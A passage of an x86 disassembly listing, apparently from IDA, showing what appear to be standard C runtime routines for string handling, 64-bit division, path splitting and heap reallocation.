; sub_406C19+2CD�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_418DD1
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_418DCF
jz short loc_418DD1
dec ecx
dec ecx
loc_418DCF: ; CODE XREF: sub_418DA0+29�j
not ecx
loc_418DD1: ; CODE XREF: sub_418DA0+9�j
; sub_418DA0+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_418DA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418DE0 proc near ; CODE XREF: sub_407110+5C�p
; sub_407110+9C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_418E94
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_418E0A
loc_418DFB: ; CODE XREF: sub_418DE0+28�j
mov al, [edi]
inc edi
test al, al
jz short loc_418E3B
test edi, 3
jnz short loc_418DFB
loc_418E0A: ; CODE XREF: sub_418DE0+19�j
; sub_418DE0+40�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_418E0A
mov eax, [edi-4]
test al, al
jz short loc_418E48
test ah, ah
jz short loc_418E43
test eax, 0FF0000h
jz short loc_418E3E
test eax, 0FF000000h
jnz short loc_418E0A
loc_418E3B: ; CODE XREF: sub_418DE0+20�j
dec edi
jmp short loc_418E4B
; ---------------------------------------------------------------------------
loc_418E3E: ; CODE XREF: sub_418DE0+52�j
sub edi, 2
jmp short loc_418E4B
; ---------------------------------------------------------------------------
loc_418E43: ; CODE XREF: sub_418DE0+4B�j
sub edi, 3
jmp short loc_418E4B
; ---------------------------------------------------------------------------
loc_418E48: ; CODE XREF: sub_418DE0+47�j
sub edi, 4
loc_418E4B: ; CODE XREF: sub_418DE0+5C�j
; sub_418DE0+61�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_418E60
mov ebx, ecx
shr ecx, 2
jnz short loc_418EAC
jmp short loc_418E7C
; ---------------------------------------------------------------------------
loc_418E60: ; CODE XREF: sub_418DE0+75�j
; sub_418DE0+93�j
mov dl, [esi]
inc esi
test dl, dl
jz short loc_418E9A
mov [edi], dl
inc edi
dec ecx
jz short loc_418E90
test esi, 3
jnz short loc_418E60
mov ebx, ecx
shr ecx, 2
jnz short loc_418EAC
loc_418E7C: ; CODE XREF: sub_418DE0+7E�j
; sub_418DE0+CA�j
mov ecx, ebx
and ecx, 3
jz short loc_418E90
loc_418E83: ; CODE XREF: sub_418DE0+AE�j
mov dl, [esi]
inc esi
mov [edi], dl
inc edi
test dl, dl
jz short loc_418E92
dec ecx
jnz short loc_418E83
loc_418E90: ; CODE XREF: sub_418DE0+8B�j
; sub_418DE0+A1�j
mov [edi], cl
loc_418E92: ; CODE XREF: sub_418DE0+AB�j
pop ebx
pop esi
loc_418E94: ; CODE XREF: sub_418DE0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_418E9A: ; CODE XREF: sub_418DE0+85�j
; sub_418DE0+E8�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_418EA4: ; CODE XREF: sub_418DE0+E4�j
; sub_418DE0+FC�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_418E7C
loc_418EAC: ; CODE XREF: sub_418DE0+7C�j
; sub_418DE0+9A�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_418EA4
test dl, dl
jz short loc_418E9A
test dh, dh
jz short loc_418EF8
test edx, 0FF0000h
jz short loc_418EE8
test edx, 0FF000000h
jnz short loc_418EA4
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_418EE8: ; CODE XREF: sub_418DE0+F4�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_418EF8: ; CODE XREF: sub_418DE0+EC�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_418DE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418F10 proc near ; CODE XREF: sub_407252+2A2�p
; sub_40EE72+31DB�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_418F31
xor eax, eax
jmp short loc_418F33
; ---------------------------------------------------------------------------
loc_418F31: ; CODE XREF: sub_418F10+1B�j
mov eax, edi
loc_418F33: ; CODE XREF: sub_418F10+1F�j
cld
pop edi
leave
retn
sub_418F10 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_418F50
loc_418F40: ; CODE XREF: sub_418F50+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_418F50
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418F50 proc near ; CODE XREF: sub_408C26+DB�p
; sub_40DAF0+32�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00418F40 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_418F56: ; CODE XREF: sub_417880+6E�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_418F7B
loc_418F68: ; CODE XREF: sub_418F50+29�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_418F40
test cl, cl
jz short loc_418FC4
test edx, 3
jnz short loc_418F68
loc_418F7B: ; CODE XREF: sub_418F50+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_418F86: ; CODE XREF: sub_418F50+61�j
; sub_418F50+70�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_418FC8
and eax, 81010100h
jz short loc_418F86
and eax, 1010100h
jnz short loc_418FC2
and esi, 80000000h
jnz short loc_418F86
loc_418FC2: ; CODE XREF: sub_418F50+68�j
; sub_418F50+81�j ...
pop esi
pop edi
loc_418FC4: ; CODE XREF: sub_418F50+21�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_418FC8: ; CODE XREF: sub_418F50+5A�j
mov eax, [edx-4]
cmp al, bl
jz short loc_419005
test al, al
jz short loc_418FC2
cmp ah, bl
jz short loc_418FFE
test ah, ah
jz short loc_418FC2
shr eax, 10h
cmp al, bl
jz short loc_418FF7
test al, al
jz short loc_418FC2
cmp ah, bl
jz short loc_418FF0
test ah, ah
jz short loc_418FC2
jmp short loc_418F86
; ---------------------------------------------------------------------------
loc_418FF0: ; CODE XREF: sub_418F50+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_418FF7: ; CODE XREF: sub_418F50+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_418FFE: ; CODE XREF: sub_418F50+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_419005: ; CODE XREF: sub_418F50+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_418F50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41900C proc near ; CODE XREF: sub_408C26+AF�p
; sub_40EE72+47F2�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, ebx
jg short loc_419020
xor eax, eax
jmp short loc_419056
; ---------------------------------------------------------------------------
loc_419020: ; CODE XREF: sub_41900C+E�j
dec [ebp+arg_4]
push esi
jz short loc_419050
mov esi, [ebp+arg_8]
loc_419029: ; CODE XREF: sub_41900C+42�j
dec dword ptr [esi+4]
js short loc_419038
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_41903F
; ---------------------------------------------------------------------------
loc_419038: ; CODE XREF: sub_41900C+20�j
push esi
call sub_41E248
pop ecx
loc_41903F: ; CODE XREF: sub_41900C+2A�j
cmp eax, 0FFFFFFFFh
jz short loc_41905A
mov [edi], al
inc edi
cmp al, 0Ah
jz short loc_419050
dec [ebp+arg_4]
jnz short loc_419029
loc_419050: ; CODE XREF: sub_41900C+18�j
; sub_41900C+3D�j ...
and byte ptr [edi], 0
loc_419053: ; CODE XREF: sub_41900C+55�j
mov eax, ebx
pop esi
loc_419056: ; CODE XREF: sub_41900C+12�j
pop edi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41905A: ; CODE XREF: sub_41900C+36�j
cmp edi, [ebp+arg_0]
jnz short loc_419050
xor ebx, ebx
jmp short loc_419053
sub_41900C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419063 proc near ; CODE XREF: sub_409209+BF�p
; sub_409209+12C�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_48A0A8
push ebx
xor ebx, ebx
cmp eax, ebx
mov [ebp+var_4], ebx
jnz short loc_419097
mov eax, [ebp+arg_0]
mov edx, eax
cmp [eax], bl
jz short loc_4190FE
loc_41907F: ; CODE XREF: sub_419063+30�j
mov cl, [edx]
cmp cl, 61h
jl short loc_419090
cmp cl, 7Ah
jg short loc_419090
sub cl, 20h
mov [edx], cl
loc_419090: ; CODE XREF: sub_419063+21�j
; sub_419063+26�j
inc edx
cmp [edx], bl
jnz short loc_41907F
jmp short loc_4190FE
; ---------------------------------------------------------------------------
loc_419097: ; CODE XREF: sub_419063+11�j
push esi
push edi
push 1
push ebx
push ebx
push ebx
push 0FFFFFFFFh
mov esi, 200h
push [ebp+arg_0]
push esi
push eax
call sub_41E709
mov edi, eax
add esp, 20h
cmp edi, ebx
jz short loc_4190F0
push edi
call sub_417B89
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jz short loc_4190F0
push 1
push ebx
push edi
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push esi
push ds:dword_48A0A8
call sub_41E709
add esp, 20h
test eax, eax
jz short loc_4190F0
push [ebp+var_4]
push [ebp+arg_0]
call sub_4179C0
pop ecx
pop ecx
loc_4190F0: ; CODE XREF: sub_419063+53�j
; sub_419063+61�j ...
push [ebp+var_4]
call sub_417C3B
mov eax, [ebp+arg_0]
pop ecx
pop edi
pop esi
loc_4190FE: ; CODE XREF: sub_419063+1A�j
; sub_419063+32�j
pop ebx
leave
retn
sub_419063 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419101 proc near ; CODE XREF: sub_40A951+6�p
; sub_40A96F+4A�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_48A0A8, 0
push ebx
push esi
push edi
jnz short loc_41912E
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_4191C7
cmp eax, 5Ah
jg loc_4191C7
add eax, 20h
jmp loc_4191C7
; ---------------------------------------------------------------------------
loc_41912E: ; CODE XREF: sub_419101+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_419162
cmp ds:dword_4397AC, esi
jle short loc_419150
push esi
push ebx
call sub_41A642
pop ecx
pop ecx
jmp short loc_41915A
; ---------------------------------------------------------------------------
loc_419150: ; CODE XREF: sub_419101+42�j
mov eax, ds:off_4395A0
mov al, [eax+ebx*2]
and eax, esi
loc_41915A: ; CODE XREF: sub_419101+4D�j
test eax, eax
jnz short loc_419162
loc_41915E: ; CODE XREF: sub_419101+AD�j
mov eax, ebx
jmp short loc_4191C7
; ---------------------------------------------------------------------------
loc_419162: ; CODE XREF: sub_419101+3A�j
; sub_419101+5B�j
mov edx, ds:off_4395A0
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_419186
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_41918F
; ---------------------------------------------------------------------------
loc_419186: ; CODE XREF: sub_419101+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_41918F: ; CODE XREF: sub_419101+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push ds:dword_48A0A8
call sub_41E709
add esp, 20h
test eax, eax
jz short loc_41915E
cmp eax, esi
jnz short loc_4191BA
movzx eax, [ebp+var_4]
jmp short loc_4191C7
; ---------------------------------------------------------------------------
loc_4191BA: ; CODE XREF: sub_419101+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_4191C7: ; CODE XREF: sub_419101+16�j
; sub_419101+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_419101 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4191D0 proc near ; CODE XREF: sub_40B822+3D�p
; sub_40D01A+2D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_4191F1
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_419241
; ---------------------------------------------------------------------------
loc_4191F1: ; CODE XREF: sub_4191D0+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_4191FF: ; CODE XREF: sub_4191D0+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_4191FF
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_41922A
cmp edx, [esp+4+arg_4]
ja short loc_41922A
jb short loc_419232
cmp eax, [esp+4+arg_0]
jbe short loc_419232
loc_41922A: ; CODE XREF: sub_4191D0+4A�j
; sub_4191D0+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_419232: ; CODE XREF: sub_4191D0+52�j
; sub_4191D0+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_419241: ; CODE XREF: sub_4191D0+1F�j
pop ebx
retn 10h
sub_4191D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419250 proc near ; CODE XREF: sub_40B822+24�p
; sub_40D01A+3F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_419272
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_4192B3
; ---------------------------------------------------------------------------
loc_419272: ; CODE XREF: sub_419250+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_419280: ; CODE XREF: sub_419250+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_419280
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_4192AE
cmp edx, [esp+8+arg_4]
ja short loc_4192AE
jb short loc_4192AF
cmp eax, [esp+8+arg_0]
jbe short loc_4192AF
loc_4192AE: ; CODE XREF: sub_419250+4E�j
; sub_419250+54�j
dec esi
loc_4192AF: ; CODE XREF: sub_419250+56�j
; sub_419250+5C�j
xor edx, edx
mov eax, esi
loc_4192B3: ; CODE XREF: sub_419250+20�j
pop esi
pop ebx
retn 10h
sub_419250 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4192B8 proc near ; CODE XREF: sub_40B8D8+1E3�p
; sub_40E6A9+F7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_417AB0
cmp eax, 1
pop ecx
jb short loc_4192F3
cmp byte ptr [ebx+1], 3Ah
jnz short loc_4192F3
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_4192EF
push 2
push ebx
push esi
call sub_41ED0D
add esp, 0Ch
and byte ptr [esi+2], 0
loc_4192EF: ; CODE XREF: sub_4192B8+25�j
inc ebx
inc ebx
jmp short loc_4192FD
; ---------------------------------------------------------------------------
loc_4192F3: ; CODE XREF: sub_4192B8+18�j
; sub_4192B8+1E�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_4192FD
and byte ptr [eax], 0
loc_4192FD: ; CODE XREF: sub_4192B8+39�j
; sub_4192B8+40�j
and [ebp+arg_4], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov esi, 0FFh
mov [ebp+arg_0], eax
jz short loc_419375
loc_419310: ; CODE XREF: sub_4192B8+87�j
mov cl, [eax]
movzx edx, cl
test ds:byte_48B561[edx], 4
jz short loc_419321
inc eax
jmp short loc_41933B
; ---------------------------------------------------------------------------
loc_419321: ; CODE XREF: sub_4192B8+64�j
cmp cl, 2Fh
jz short loc_419335
cmp cl, 5Ch
jz short loc_419335
cmp cl, 2Eh
jnz short loc_41933B
mov [ebp+var_4], eax
jmp short loc_41933B
; ---------------------------------------------------------------------------
loc_419335: ; CODE XREF: sub_4192B8+6C�j
; sub_4192B8+71�j
lea ecx, [eax+1]
mov [ebp+arg_4], ecx
loc_41933B: ; CODE XREF: sub_4192B8+67�j
; sub_4192B8+76�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_419310
mov edi, [ebp+arg_4]
mov [ebp+arg_0], eax
test edi, edi
jz short loc_419375
cmp [ebp+arg_8], 0
jz short loc_419370
sub edi, ebx
cmp edi, esi
jb short loc_419359
mov edi, esi
loc_419359: ; CODE XREF: sub_4192B8+9D�j
push edi
push ebx
push [ebp+arg_8]
call sub_41ED0D
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_419370: ; CODE XREF: sub_4192B8+97�j
mov ebx, [ebp+arg_4]
jmp short loc_41937F
; ---------------------------------------------------------------------------
loc_419375: ; CODE XREF: sub_4192B8+56�j
; sub_4192B8+91�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_41937F
and byte ptr [ecx], 0
loc_41937F: ; CODE XREF: sub_4192B8+BB�j
; sub_4192B8+C2�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_4193D2
cmp edi, ebx
jb short loc_4193D2
cmp [ebp+arg_C], 0
jz short loc_4193AF
sub edi, ebx
cmp edi, esi
jb short loc_419398
mov edi, esi
loc_419398: ; CODE XREF: sub_4192B8+DC�j
push edi
push ebx
push [ebp+arg_C]
call sub_41ED0D
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_4193AF: ; CODE XREF: sub_4192B8+D6�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_4193FA
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_4193BF
mov esi, eax
loc_4193BF: ; CODE XREF: sub_4192B8+103�j
push esi
push [ebp+var_4]
push edi
call sub_41ED0D
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_4193FA
; ---------------------------------------------------------------------------
loc_4193D2: ; CODE XREF: sub_4192B8+CC�j
; sub_4192B8+D0�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_4193F0
sub eax, ebx
cmp eax, esi
jnb short loc_4193E1
mov esi, eax
loc_4193E1: ; CODE XREF: sub_4192B8+125�j
push esi
push ebx
push edi
call sub_41ED0D
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_4193F0: ; CODE XREF: sub_4192B8+11F�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_4193FA
and byte ptr [eax], 0
loc_4193FA: ; CODE XREF: sub_4192B8+FC�j
; sub_4192B8+118�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4192B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4193FF proc near ; CODE XREF: sub_40BFE1+19�p
; sub_40D633+1C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push [ebp+arg_C]
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
push [ebp+arg_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
mov [ebp+var_14], 42h
push eax
call sub_419E38
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_41943D
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_41944A
; ---------------------------------------------------------------------------
loc_41943D: ; CODE XREF: sub_4193FF+34�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_419D23
pop ecx
pop ecx
loc_41944A: ; CODE XREF: sub_4193FF+3C�j
mov eax, esi
pop esi
leave
retn
sub_4193FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41944F proc near ; CODE XREF: sub_40C259+2E�p
; sub_418603+35�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
push ebx
push esi
push edi
jnz short loc_41946A
push [ebp+arg_4]
call sub_417B89
pop ecx
jmp loc_4196EA
; ---------------------------------------------------------------------------
loc_41946A: ; CODE XREF: sub_41944F+B�j
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_41947F
push [ebp+arg_0]
call sub_417C3B
pop ecx
jmp loc_4196E8
; ---------------------------------------------------------------------------
loc_41947F: ; CODE XREF: sub_41944F+20�j
mov eax, ds:dword_48B688
cmp eax, 3
jnz loc_41958F
loc_41948D: ; CODE XREF: sub_41944F+12E�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_41956B
push [ebp+arg_0]
call sub_41AD89
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_419546
cmp esi, ds:dword_48B680
ja short loc_4194FF
mov edi, [ebp+arg_0]
push esi
push edi
push ebx
call sub_41B592
add esp, 0Ch
test eax, eax
jnz short loc_4194FB
push esi
call sub_41B0DD
mov edi, eax
pop ecx
test edi, edi
jz short loc_4194FF
mov ebx, [ebp+arg_0]
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_4194DF
mov eax, esi
loc_4194DF: ; CODE XREF: sub_41944F+8C�j
push eax
push ebx
push edi
call sub_417390
push ebx
call sub_41AD89
push [ebp+arg_0]
mov ebx, eax
push ebx
call sub_41ADB4
add esp, 18h
loc_4194FB: ; CODE XREF: sub_41944F+74�j
test edi, edi
jnz short loc_419542
loc_4194FF: ; CODE XREF: sub_41944F+62�j
; sub_41944F+81�j
test esi, esi
jnz short loc_419506
push 1
pop esi
loc_419506: ; CODE XREF: sub_41944F+B2�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push ds:dword_48B684
call ds:dword_4240E8 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_419542
mov ecx, [ebp+arg_0]
mov eax, [ecx-4]
dec eax
cmp eax, esi
jb short loc_41952E
mov eax, esi
loc_41952E: ; CODE XREF: sub_41944F+DB�j
push eax
push ecx
push edi
call sub_417390
push [ebp+arg_0]
push ebx
call sub_41ADB4
add esp, 14h
loc_419542: ; CODE XREF: sub_41944F+AE�j
; sub_41944F+D0�j
test ebx, ebx
jnz short loc_419567
loc_419546: ; CODE XREF: sub_41944F+56�j
test esi, esi
jnz short loc_41954D
push 1
pop esi
loc_41954D: ; CODE XREF: sub_41944F+F9�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push [ebp+arg_0]
push 0
push ds:dword_48B684
call ds:dword_424194 ; RtlReAllocateHeap
mov edi, eax
loc_419567: ; CODE XREF: sub_41944F+F5�j
test edi, edi
jnz short loc_419588
loc_41956B: ; CODE XREF: sub_41944F+43�j
cmp ds:dword_48A074, 0
jz short loc_419588
push esi
call sub_41AB54
test eax, eax
pop ecx
jnz loc_41948D
jmp loc_4196E8
; ---------------------------------------------------------------------------
loc_419588: ; CODE XREF: sub_41944F+11A�j
; sub_41944F+123�j ...
mov eax, edi
jmp loc_4196EA
; ---------------------------------------------------------------------------
loc_41958F: ; CODE XREF: sub_41944F+38�j
cmp eax, 2
jnz loc_4196AA
cmp esi, 0FFFFFFE0h
ja short loc_4195AC
test esi, esi
jbe short loc_4195A9
add esi, 0Fh
and esi, 0FFFFFFF0h
jmp short loc_4195AC
; ---------------------------------------------------------------------------
loc_4195A9: ; CODE XREF: sub_41944F+150�j
push 10h
pop esi
loc_4195AC: ; CODE XREF: sub_41944F+14C�j
; sub_41944F+158�j ...
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_41968C
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_41BAE4
mov ebx, eax
add esp, 0Ch
test ebx, ebx
jz loc_419670
cmp esi, ds:dword_43B7E4
jnb short loc_419634
mov edi, esi
shr edi, 4
push edi
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_41BEAC
add esp, 10h
test eax, eax
jz short loc_4195FA
mov edi, [ebp+arg_0]
jmp short loc_41962C
; ---------------------------------------------------------------------------
loc_4195FA: ; CODE XREF: sub_41944F+1A4�j
push edi
call sub_41BB80
mov edi, eax
pop ecx
test edi, edi
jz short loc_419634
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_419613
mov eax, esi
loc_419613: ; CODE XREF: sub_41944F+1C0�j
push eax
push [ebp+arg_0]
push edi
call sub_417390
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_41BB3B
add esp, 18h
loc_41962C: ; CODE XREF: sub_41944F+1A9�j
test edi, edi
jnz loc_419588
loc_419634: ; CODE XREF: sub_41944F+18B�j
; sub_41944F+1B6�j
push esi
push 0
push ds:dword_48B684
call ds:dword_4240E8 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_41968C
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_419655
mov eax, esi
loc_419655: ; CODE XREF: sub_41944F+202�j
push eax
push [ebp+arg_0]
push edi
call sub_417390
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_41BB3B
add esp, 18h
jmp short loc_419684
; ---------------------------------------------------------------------------
loc_419670: ; CODE XREF: sub_41944F+17F�j
push esi
push [ebp+arg_0]
push 0
push ds:dword_48B684
call ds:dword_424194 ; RtlReAllocateHeap
mov edi, eax
loc_419684: ; CODE XREF: sub_41944F+21F�j
test edi, edi
jnz loc_419588
loc_41968C: ; CODE XREF: sub_41944F+162�j
; sub_41944F+1F8�j
cmp ds:dword_48A074, 0
jz loc_419588
push esi
call sub_41AB54
test eax, eax
pop ecx
jnz loc_4195AC
jmp short loc_4196E8
; ---------------------------------------------------------------------------
loc_4196AA: ; CODE XREF: sub_41944F+143�j
; sub_41944F+297�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_4196D4
test esi, esi
jnz short loc_4196B8
push 1
pop esi
loc_4196B8: ; CODE XREF: sub_41944F+264�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push [ebp+arg_0]
push 0
push ds:dword_48B684
call ds:dword_424194 ; RtlReAllocateHeap
test eax, eax
jnz short loc_4196EA
loc_4196D4: ; CODE XREF: sub_41944F+260�j
cmp ds:dword_48A074, 0
jz short loc_4196EA
push esi
call sub_41AB54
test eax, eax
pop ecx
jnz short loc_4196AA
